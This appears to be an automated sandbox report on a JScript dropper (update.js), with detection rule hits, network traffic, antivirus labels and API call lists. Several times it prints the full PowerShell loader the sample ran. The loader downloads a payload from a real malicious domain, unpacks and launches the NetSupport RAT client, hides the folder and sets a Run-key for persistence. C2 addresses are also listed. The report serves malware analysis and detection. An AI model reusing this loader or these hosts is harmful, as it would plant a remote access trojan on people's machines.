                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 79.141.163.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49704
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3e565921-cebc-473e-80e2-5ed578f3559d Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Engine Version = 5.1.19041.1682 Runspace ID = 577abfa9-00aa-4c41-b260-64ff1bfc179e Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3e565921-cebc-473e-80e2-5ed578f3559d Host Application = 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.e
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 3528, ProcessName: wscript.exe
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-

                                Remote Access Functionality

                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Roaming\HHIAHYOW-5\NSM.LIC
                                Source: Suricata IDS alert: Timestamp: 2024-09-25T19:01:57.660273+0200, SID: 2827745, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 192.168.2.16, Source Port: 49706, Destination IP: 5.181.159.137, Destination Port: 443, Protocol: TCP

                                AV Detection

                                Source: https://roadrunnersell.com/trade/d.php?5517Avira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/Avira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/9Avira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/trade/fix.php?532dAvira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/trade/fix.php?532Avira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,13_2_110ADA40
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: SSL 3.0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49710 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,13_2_1106ABD0

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49706 -> 5.181.159.137:443
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 79.141.163.131 443Jump to behavior
                                Source: global trafficHTTP traffic detected: GET /trade/d.php?5517 HTTP/1.1Host: roadrunnersell.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD
                                Source: Joe Sandbox ViewASN Name: HZ-US-ASBG
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: POST /trade/fix.php?532 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: roadrunnersell.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: SSL 3.0
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficDNS traffic detected: DNS query: roadrunnersell.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST /trade/fix.php?532 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: roadrunnersell.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exeString found in binary or memory: http://127.0.0.1
                                Source: client32.exeString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1301369817.000002B2D2997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatio
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1450836451.000002BB045AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1192606451.000002BB00351000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1323964009.000002B2CFBED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.1353432566.000002BB08DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: wscript.exe, 00000000.00000003.1353432566.000002BB08E4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/
                                Source: wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/9
                                Source: wscript.exe, 00000000.00000003.1406668213.000002BB03B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1377935458.000002BB09451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/trade/d.php?5517
                                Source: wscript.exeString found in binary or memory: https://roadrunnersell.com/trade/fix.php?532
                                Source: wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/trade/fix.php?532d
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                                Source: wscript.exe, 00000009.00000003.1439411024.000002B2CFE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com(d
                                Source: wscript.exe, 00000000.00000003.1237831355.000002BB00596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.comHlY
                                Source: wscript.exe, 00000000.00000003.1396552350.000002BB06742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.comX
